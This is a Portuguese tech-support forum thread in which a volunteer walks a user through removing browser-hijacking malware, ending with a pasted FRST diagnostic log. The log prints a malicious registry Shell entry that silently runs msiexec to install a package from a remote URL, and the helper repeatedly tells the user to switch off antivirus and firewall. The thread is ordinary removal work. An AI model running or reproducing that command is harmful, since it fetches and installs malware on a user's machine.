Ir ao conteúdo
  • Cadastre-se
Renan Gs

Avast desativado Chrome lento

Recommended Posts

Quando incio o PC o avast esta desativado, vi que apareceu processos( Baoji e Baofeng) no gerenciador que nunca tinha visto e pastas que alteravam o Chrome (Dohat e EastNess). 

 

ZA-Scan.txt

Compartilhar este post


Link para o post
Compartilhar em outros sites

@Renan Gs

 

Por favor, atente para o seguinte:

  • Sobre o Fórum: Este é um espaço privado, não público. Seu uso é um privilégio, não um direito.
  • Caso fique sem resposta durante 3 dias, me envie uma Mensagem Privada (MP);
  • O que será passado aqui, somente será com relação ao problema do seu computador portanto, não faça mais em nenhum outro;
  • Siga, por favor, atentamente as instruções passadas e em caso de dúvidas não hesite em perguntá-las;
  • Respeite a ordem das instruções passadas.
  • Observação: Não tome outra medida além das passadas aqui; atente para que, caso peça ajuda em outro fórum, não deixe de nos informar, sob risco de desconfigurar seu computador!

 

Desative temporariamente seu antivírus, antispywares e firewall, para não causar conflitos.

 

Abra o seu Bloco de Notas, copie (control + c) e cole (control + v) todo o texto que está abaixo:

 

createsrpoint;
shortcutfix;
ffdefaults;
chrdefaults;
resetwmi;
resetieproxy;
network.proxy;ff
emptyclsid;
autoclean;
ipconfig /flushdns >>"%temp%\log.txt";b

 

Salve este arquivo na na sua área de trabalho com o nome zascript

Novamente, execute o ZA-Scan.exe e aguarde.
Copie e cole o conteúdo desse arquivo em sua próxima resposta.

Compartilhar este post


Link para o post
Compartilhar em outros sites

@Renan Gs

 

# Etapa nº 1 #
 
Baixe o AdwCleaner e salve em sua Área de trabalho (Desktop)

Execute o arquivo adwcleaner.exe

 

Atenção: Usuários Windows Vista, 7 e 8, cliquem com o botão direito do mouse e escolha: execadmin.png 

  • Clique na aba Opções e deixe marcado apenas "Restaurar Políticas do IE" e "Restaurar Políticas do Chrome"
  • Clique no botão Verificar e aguarde o exame finalizar.
  • Clique no botão Limpar.
  • Abrirá um bloco de notas com o resultado.
  • Selecione, copie e cole o conteúdo deste log em sua sua próxima resposta.
  • O log também será salvo em C:\AdwCleaner


NOTA: Se o AdwCleaner encontrar arquivos que não consiga remover, poderá ter de reiniciar o PC. Faça isso imediatamente, ao ser perguntado se quer reiniciar.
 
# Etapa nº 2 #
 
Desative temporariamente seu antivirus, antispywares e firewall, para não causar conflitos.

Baixe o Junkware Removal Tool (JRT) e salve em sua Área de trabalho (Desktop)

 

Clique duas vezes para executar o jrt.exe.
 

Atenção: Usuários Windows Vista, 7 e 8, cliquem com o botão direito do mouse e escolha: execadmin.png 

  • A ferramenta começará o exame do seu sistema.
  • Tenha paciência pois pode demorar um pouco dependendo da quantidades de itens a examinar.
  • Ao final um log se abrirá. Será salvo no desktop com o nome de JRT.txt.
  • Selecione, copie e cole o conteúdo deste log em sua sua próxima resposta.

 
# Etapa nº 3 #
 
Desative temporariamente seu antivirus, antispywares e firewall, para não causar conflitos.

Faça o download do ZHPCleaner e salve em sua Área de trabalho (Desktop)

 

Atenção: Usuários Windows Vista, 7 e 8, cliquem com o botão direito do mouse e escolha: execadmin.png

  • Clique no botão Scanner.
  • A ferramenta começara o exame do seu sistema.
  • Tenha paciência pois pode demorar um pouco dependendo da quantidades de itens a examinar.
  • Em seguida clique no botão Reparar.
  • Será gerado um log chamado ZHPCleaner.txt
  • Selecione, copie e cole o conteúdo deste log em sua sua próxima resposta.

Compartilhar este post


Link para o post
Compartilhar em outros sites

@Renan Gs

 

Baixe o Farbar Recovery Scan Tool e salve-o na Área de Trabalho (Desktop).


32 bit (x86) ou 64 bit (x64)


Clique duas vezes para executar a ferramenta.

  • Atenção: Usuários Windows Vista, 7 e 8, cliquem com o botão direito do mouse e escolha: execadmin.png

Marque a caixa Arquivos 90 dias,  e clique no botão Examinar.

Aguarde e ao final os logs FRST.txt e Addition.txt serão salvos em sua Área de Trabalho (Desktop).

Selecione, copie e cole o conteúdo do log FRST.txt em sua próxima resposta.

Anexe o log Addition.txt

Compartilhar este post


Link para o post
Compartilhar em outros sites

@Turco

 

Resultado do exame da Farbar Recovery Scan Tool (FRST) (x64) Versão: 06-05-2017
Executado por User (administrador) em USER-PC (06-05-2017 21:52:37)
Executando a partir de C:\Users\User\Desktop
Perfis Carregados: User (Perfis Disponíveis: User)
Platform: Windows 7 Professional Service Pack 1 (X64) Idioma: Português (Brasil)
Internet Explorer Versão 8 (Navegador padrão: Chrome)
Modo da Inicialização: Normal
Tutorial da Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processos (Whitelisted) =================

(Se uma entrada for incluída na fixlist, o processo será fechado. O arquivo não será movido.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(AVAST Software) C:\Users\User\AppData\Local\background_fault\aswRD.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(AVAST Software s.r.o.) C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Registro (Whitelisted) ====================

(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido. O arquivo não será movido.)

HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [213824 2017-05-04] (AVAST Software)
HKU\S-1-5-21-1412283526-274104746-2871248256-1000\...\Run: [background_fault] => C:\Users\User\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <===== ATENÇÃO
HKU\S-1-5-21-1412283526-274104746-2871248256-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1QRUE5RjJWFUZWNkEyN8RLOYVLMWQXNkEcRYNLOWY5OH== /q
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-05-04] (AVAST Software)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-05-04] (AVAST Software)
BootExecute: autocheck autochk 

==================== Internet (Whitelisted) ====================

(Se um ítem for incluído na fixlist, sendo um ítem do Registro, será removido ou restaurado para o padrão.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{6C3FF1FC-900E-43CA-8913-274F0BCBFDC6}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKU\S-1-5-21-1412283526-274104746-2871248256-1000\Software\Microsoft\Internet Explorer\Main,Start Page = 
HKU\S-1-5-21-1412283526-274104746-2871248256-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pt-br/?ocid=iehp
SearchScopes: HKU\S-1-5-21-1412283526-274104746-2871248256-1000 -> {012E1000-F331-11DB-8314-0800200C9A66} URL = hxxp://www.google.com/search?q={searchTerms}
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-04-05] (AVAST Software)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-04-05] (AVAST Software)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2012-10-01] (Microsoft Corporation)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Corporation)

FireFox:
========
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-04] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2012-10-01] (Microsoft Corporation)

Chrome: 
=======
CHR Session Restore: Default -> está habilitado.
CHR Profile: C:\Users\User\AppData\Local\Google\Chrome\User Data\Default [2017-05-06]
CHR Extension: (Avast SafePrice) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\eofcbnmajmjmplflapaojjnihcjkigck [2017-05-05]
CHR Extension: (Avast Online Security) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2017-05-05]
CHR Extension: (Pagamentos da Chrome Web Store) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-05-05]
CHR Extension: (Chrome Media Router) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-05-05]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx

==================== Serviços (Whitelisted) ====================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [7346208 2017-05-04] (AVAST Software s.r.o.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [263304 2017-05-04] (AVAST Software)
R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-04] (windows) [Arquivo não assinado]
R2 GameExplorerUpdate; C:\ProgramData\Microsoft\Windows\GameExplorer\Resources.dll [113664 2017-04-19] () [Arquivo não assinado]
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [319096 2016-05-12] (Intel Corporation)
S4 VIAKaraokeService; C:\Windows\system32\viakaraokesrv.exe [38024 2015-08-22] (VIA Technologies, Inc.)
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-13] (Microsoft Corporation)
S2 AppleNotificationsSrv; C:\ProgramData\Software\Apple\Apps\Notification.dll [X]

===================== Drivers (Whitelisted) ======================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

R1 aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [311808 2017-05-04] (AVAST Software s.r.o.)
R0 aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [190256 2017-05-04] (AVAST Software s.r.o.)
R0 aswblog; C:\Windows\system32\drivers\aswbloga.sys [334576 2017-05-04] (AVAST Software s.r.o.)
R0 aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [49016 2017-05-04] (AVAST Software s.r.o.)
S3 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [38296 2017-05-04] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [128648 2017-05-04] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [101152 2017-05-04] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [75704 2017-05-04] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1007160 2017-05-04] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [569192 2017-05-04] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [158368 2017-05-04] (AVAST Software)
R0 aswVmm; C:\Windows\system32\drivers\aswVmm.sys [339696 2017-05-04] (AVAST Software)
R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [30960 2015-05-29] (Intel Corporation)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [190032 2016-04-04] (Intel Corporation)

==================== NetSvcs (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)


==================== Três Meses Criados arquivos e pastas ========

(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)

2017-05-06 21:52 - 2017-05-06 21:53 - 00010791 _____ C:\Users\User\Desktop\FRST.txt
2017-05-06 21:51 - 2017-05-06 21:52 - 00000000 ____D C:\FRST
2017-05-06 21:50 - 2017-05-06 21:50 - 02429440 _____ (Farbar) C:\Users\User\Desktop\FRST64.exe
2017-05-05 22:30 - 2017-05-05 22:33 - 00008708 _____ C:\Users\User\Desktop\ZHPCleaner.txt
2017-05-05 22:22 - 2017-05-05 22:33 - 00000000 ____D C:\Users\User\AppData\Roaming\ZHP
2017-05-05 22:22 - 2017-05-05 22:22 - 00000791 _____ C:\Users\User\Desktop\ZHPCleaner.lnk
2017-05-05 22:22 - 2017-05-05 22:22 - 00000000 ____D C:\Users\User\AppData\Local\ZHP
2017-05-05 22:21 - 2017-05-05 22:21 - 02766336 _____ C:\Users\User\Desktop\ZHPCleaner.exe
2017-05-05 22:18 - 2017-05-05 22:18 - 00004478 _____ C:\Users\User\Desktop\JRT.txt
2017-05-05 22:12 - 2017-05-05 22:12 - 01663672 _____ (Malwarebytes) C:\Users\User\Desktop\JRT.exe
2017-05-05 22:10 - 2017-05-06 15:54 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-05-05 21:46 - 2017-05-05 22:05 - 00000000 ____D C:\AdwCleaner
2017-05-05 21:45 - 2017-05-05 21:45 - 04102600 _____ C:\Users\User\Desktop\adwcleaner_6.046.exe
2017-05-05 12:47 - 2017-05-05 12:47 - 00000000 ____D C:\Users\Todos os Usuários\BIT
2017-05-05 12:47 - 2017-05-05 12:47 - 00000000 ____D C:\ProgramData\BIT
2017-05-04 16:33 - 2017-05-04 16:33 - 00400456 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2017-05-04 16:30 - 2017-05-05 12:47 - 00000000 ____D C:\Users\User\AppData\Local\background_fault
2017-05-03 23:35 - 2017-05-03 23:35 - 00000000 ____D C:\Users\User\AppData\Local\VirtualStore
2017-05-03 23:30 - 2017-05-03 23:30 - 24093582 _____ C:\Windows\repository.backup
2017-05-03 23:30 - 2017-05-03 23:02 - 00024064 _____ C:\Windows\zoek-delete.exe
2017-05-03 13:18 - 2017-05-03 13:18 - 00000000 _____ C:\Windows\SysWOW64\3333333
2017-05-03 13:18 - 2017-05-03 13:18 - 00000000 _____ C:\Windows\SysWOW64\2222222
2017-05-03 13:18 - 2017-05-03 13:18 - 00000000 _____ C:\Windows\SysWOW64\1111111
2017-04-27 13:06 - 2017-05-04 12:19 - 00000000 ____D C:\Windows\psgo
2017-04-27 11:50 - 2017-04-27 11:50 - 00000000 ____D C:\Users\User\AppData\Roaming\Google
2017-04-25 21:28 - 2017-04-25 21:28 - 00119812 _____ C:\Users\User\Downloads\nine logo2.psd
2017-04-25 21:17 - 2017-04-25 21:17 - 00098387 _____ C:\Users\User\Downloads\logo nine.psd
2017-04-25 15:01 - 2017-05-03 23:26 - 00000000 ____D C:\zoek_backup
2017-04-23 20:45 - 2017-04-23 20:45 - 00013643 _____ C:\Users\User\Downloads\CRIMES.DO_.COL1TEMPDUB.rar
2017-04-23 14:58 - 2016-12-18 02:42 - 538937344 _____ C:\Users\User\Downloads\Bosch.S01E04.480p.Dual.[www.theseriesdubladas.com].avi
2017-04-23 13:10 - 2017-04-23 13:11 - 499030134 _____ C:\Users\User\Downloads\Bosch.S01E06.480p.Dual.[www.theseriesdubladas.com].rar
2017-04-23 13:02 - 2017-04-23 13:03 - 469901430 _____ C:\Users\User\Downloads\Bosch.S01E05.480p.Dual.[www.theseriesdubladas.com].rar
2017-04-23 12:52 - 2017-04-23 12:54 - 538937462 _____ C:\Users\User\Downloads\Bosch.S01E04.480p.Dual.[www.theseriesdubladas.com].rar
2017-04-23 00:42 - 2017-04-23 00:42 - 00207585 _____ C:\Users\User\Downloads\BOSCH-S1.rar
2017-04-23 00:42 - 2015-06-22 21:17 - 00030690 _____ C:\Users\User\Downloads\Bosch Season 1 COMPLETE WEBRip x264 FaiLED.torrent
2017-04-23 00:42 - 2015-06-22 21:16 - 00000000 ____D C:\Users\User\Downloads\Legendas
2017-04-22 23:55 - 2016-12-15 20:02 - 523274240 _____ C:\Users\User\Downloads\Bosch.S01E03.480p.Dual.[www.theseriesdubladas.com].avi
2017-04-22 23:44 - 2017-04-22 23:54 - 523274358 _____ C:\Users\User\Downloads\Bosch.S01E03.480p.Dual.[www.theseriesdubladas.com].rar
2017-04-22 22:36 - 2016-12-15 19:52 - 653812955 _____ C:\Users\User\Downloads\Bosch.S01E02.720p.Dual.[www.theseriesdubladas.com].mkv
2017-04-22 22:16 - 2017-04-22 22:17 - 653813073 _____ C:\Users\User\Downloads\Bosch.S01E02.720p.Dual.[www.theseriesdubladas.com].rar
2017-04-22 21:13 - 2016-12-15 19:49 - 734148935 _____ C:\Users\User\Downloads\Bosch.S01E01.720p.Dual.[www.theseriesdubladas.com].mkv
2017-04-22 21:05 - 2017-04-22 21:08 - 734149053 _____ C:\Users\User\Downloads\Bosch.S01E01.720p.Dual.[www.theseriesdubladas.com].rar
2017-04-22 11:15 - 2017-04-22 11:15 - 00000000 ____D C:\Windows\system32\appmgmt
2017-04-21 23:06 - 2017-04-22 13:14 - 00000000 ___RD C:\Users\User\Downloads\Animecote - Best Anime Songs 2015
2017-04-21 22:59 - 2017-04-21 22:59 - 201587218 _____ C:\Users\User\Downloads\Animecote - Best Anime Songs 2015.rar
2017-04-21 22:55 - 2017-04-21 23:30 - 00000000 ___RD C:\Users\User\Downloads\Animecote - Best Anime Songs 2014
2017-04-21 22:48 - 2017-04-21 22:49 - 174311619 _____ C:\Users\User\Downloads\Animecote - Best Anime Songs 2014 v2.rar
2017-04-21 22:44 - 2017-04-21 22:45 - 188149328 _____ C:\Users\User\Downloads\Animecote - Best Anime Songs 2014.rar
2017-04-21 14:14 - 2017-05-05 12:47 - 00000000 _____ C:\Windows\SysWOW64\22
2017-04-21 12:16 - 2017-05-05 12:47 - 00000000 _____ C:\Windows\SysWOW64\11
2017-04-21 12:16 - 2017-05-03 13:18 - 00000000 _____ C:\Windows\SysWOW64\33
2017-04-21 12:11 - 2017-04-27 11:48 - 00000000 ____D C:\Program Files (x86)\BiaoJi
2017-04-19 13:24 - 2017-05-05 22:05 - 00000000 ____D C:\Windows\system32\log
2017-04-19 13:24 - 2017-05-03 13:18 - 00002160 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-04-19 13:23 - 2017-04-19 13:23 - 00000000 ____D C:\Program Files (x86)\MIO
2017-04-19 13:20 - 2017-05-05 12:46 - 00000000 ____D C:\Program Files\MK
2017-04-19 13:12 - 2017-04-19 13:12 - 01370112 _____ C:\Users\User\Desktop\ZA-Scan.exe
2017-04-18 22:55 - 2017-05-03 13:18 - 00000193 _____ C:\Users\User\Desktop\Chrome.lnk
2017-04-17 19:51 - 2017-04-17 19:51 - 00000000 ____D C:\Users\User\Downloads\fy_iceworld2k
2017-04-17 19:50 - 2017-04-17 19:50 - 00180478 _____ C:\Users\User\Downloads\fy_iceworld2k.zip
2017-04-17 19:44 - 2017-04-17 19:44 - 00000000 ____D C:\Users\User\Downloads\fy_iceworld
2017-04-17 19:43 - 2017-04-17 19:43 - 00057034 _____ C:\Users\User\Downloads\fy_iceworld.zip
2017-04-17 13:43 - 2017-05-03 13:19 - 00000000 ____D C:\Users\User\AppData\LocalLow\Mozilla
2017-04-17 13:43 - 2017-04-17 13:43 - 00000000 ____D C:\Users\User\AppData\Roaming\Mozilla
2017-04-17 13:42 - 2017-05-03 13:19 - 00002000 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-04-17 13:42 - 2017-05-03 13:19 - 00001930 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-04-15 23:45 - 2017-04-25 13:58 - 00000000 ____D C:\Users\User\AppData\Local\Adobe
2017-04-15 23:45 - 2017-04-15 23:45 - 00000000 ____D C:\Users\User\AppData\Roaming\Adobe
2017-04-15 23:45 - 2017-04-15 23:45 - 00000000 ____D C:\Users\Todos os Usuários\Adobe
2017-04-15 23:45 - 2017-04-15 23:45 - 00000000 ____D C:\ProgramData\Adobe
2017-04-13 13:10 - 2017-04-13 13:10 - 00003574 _____ C:\Windows\System32\Tasks\Windows-WoShiBeiYongDe
2017-04-13 13:09 - 2017-04-13 13:09 - 00000000 ____D C:\Users\User\AppData\Roaming\SSMgre
2017-04-10 10:03 - 2017-04-13 13:10 - 00003564 _____ C:\Windows\System32\Tasks\PowerWord-SCT-JT
2017-04-09 23:15 - 2017-04-09 23:15 - 00002596 _____ C:\Users\User\Desktop\µTorrent.lnk
2017-04-09 23:15 - 2017-04-09 23:15 - 00002596 _____ C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk
2017-04-05 13:04 - 2017-05-04 16:34 - 00003914 _____ C:\Windows\System32\Tasks\Avast Emergency Update
2017-04-05 13:04 - 2017-05-04 16:32 - 00334576 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbloga.sys
2017-04-05 13:04 - 2017-05-04 16:32 - 00311808 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsdrivera.sys
2017-04-05 13:04 - 2017-05-04 16:32 - 00190256 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsha.sys
2017-04-05 13:04 - 2017-05-04 16:32 - 00049016 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbuniva.sys
2017-03-31 17:29 - 2017-03-31 17:29 - 00000000 ___SD C:\Users\User\AppData\LocalLow\Temp
2017-03-31 17:27 - 2017-05-03 16:10 - 00000000 ____D C:\Users\User\AppData\Roaming\uTorrent
2017-03-31 17:27 - 2017-04-13 13:09 - 00000000 ____D C:\Users\User\AppData\Roaming\ScreenShot
2017-03-31 17:27 - 2017-03-31 17:27 - 02370560 _____ (BitTorrent Inc.) C:\Users\User\Downloads\Baixaki_utorrent [1].exe
2017-03-31 17:27 - 2017-03-31 17:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScreenShot
2017-03-31 17:27 - 2017-03-31 17:27 - 00000000 ____D C:\Program Files (x86)\ScreenShot
2017-03-31 13:00 - 2017-03-31 13:01 - 00000022 _____ C:\Users\User\Downloads\MEGA-MASTERKEY renan.gs2009.txt
2017-03-25 16:28 - 2017-03-25 16:28 - 00000000 ____D C:\Users\User\Downloads\OUTROS
2017-03-24 17:58 - 2017-04-19 13:24 - 00000000 ____D C:\Users\User\AppData\Roaming\MPC-HC
2017-03-03 16:17 - 2017-05-02 12:32 - 00000000 ____D C:\Program Files (x86)\Opera
2017-03-03 16:17 - 2017-04-06 13:00 - 00003850 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1488568648
2017-03-03 16:17 - 2017-03-03 16:17 - 00001135 _____ C:\Users\Public\Desktop\Opera.lnk
2017-03-03 16:17 - 2017-03-03 16:17 - 00001135 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk
2017-03-03 16:17 - 2017-03-03 16:17 - 00000000 ____D C:\Users\User\AppData\Roaming\Opera Software
2017-03-03 16:17 - 2017-03-03 16:17 - 00000000 ____D C:\Users\User\AppData\Local\Opera Software
2017-02-22 13:59 - 2017-02-22 14:01 - 59444355 _____ C:\Users\User\Documents\aranha+ escopion.psd
2017-02-22 13:43 - 2017-04-25 20:17 - 00000132 _____ C:\Users\User\AppData\Roaming\Preferências do Formato PNG do Adobe CS6
2017-02-22 13:43 - 2017-02-22 13:43 - 01269236 _____ C:\Users\User\Documents\avatar.psd
2017-02-22 12:25 - 2017-02-22 12:26 - 00000000 ___HD C:\Users\Todos os Usuários\CanonIJScan
2017-02-22 12:25 - 2017-02-22 12:26 - 00000000 ___HD C:\ProgramData\CanonIJScan
2017-02-22 12:23 - 2017-02-22 12:25 - 00000000 ____D C:\Users\User\AppData\Roaming\Canon
2017-02-13 12:50 - 2017-02-13 12:50 - 00001578 _____ C:\Users\User\Desktop\PSCS6 - Atalho.lnk
2017-02-13 12:46 - 2017-02-18 01:22 - 00000000 ____D C:\Users\User\Documents\Nova pasta
2017-02-08 11:04 - 2017-02-08 11:04 - 00001698 _____ C:\Users\User\Desktop\Counter-Strike WaRzOnE.lnk
2017-02-08 11:04 - 2017-02-08 11:04 - 00000794 _____ C:\Users\User\Desktop\Half-Life WaRzOnE.lnk
2017-02-08 11:04 - 2017-02-08 11:04 - 00000732 _____ C:\Users\User\Desktop\HLDS.lnk
2017-02-08 11:04 - 2017-02-08 11:04 - 00000000 ____D C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HLDS
2017-02-08 11:04 - 2017-02-08 11:04 - 00000000 ____D C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Half-Life
2017-02-08 11:04 - 2017-02-08 11:04 - 00000000 ____D C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Counter-Strike
2017-02-05 13:27 - 2017-02-05 13:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon MG2400 series
2017-02-05 13:26 - 2013-03-24 04:00 - 00393728 _____ (CANON INC.) C:\Windows\system32\CNMXLMBW.DLL
2017-02-05 13:25 - 2017-02-05 13:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
2017-02-05 13:25 - 2017-02-05 13:25 - 00000000 ____D C:\Program Files (x86)\Canon
2017-02-05 13:25 - 2013-02-04 14:10 - 00321536 _____ (CANON INC.) C:\Windows\SysWOW64\CNC_BWL.dll
2017-02-05 13:25 - 2012-11-09 09:41 - 00088064 _____ C:\Windows\SysWOW64\CNC176CD.TBL
2017-02-05 13:25 - 2008-08-25 17:02 - 00015872 _____ (CANON INC.) C:\Windows\SysWOW64\CNHMCA.dll
2017-02-05 13:20 - 2017-02-05 13:20 - 00000000 ___HD C:\Users\Todos os Usuários\CanonBJ
2017-02-05 13:20 - 2017-02-05 13:20 - 00000000 ___HD C:\ProgramData\CanonBJ
2017-02-05 13:20 - 2013-02-04 14:12 - 00367104 _____ (CANON INC.) C:\Windows\system32\CNC_BWL.dll
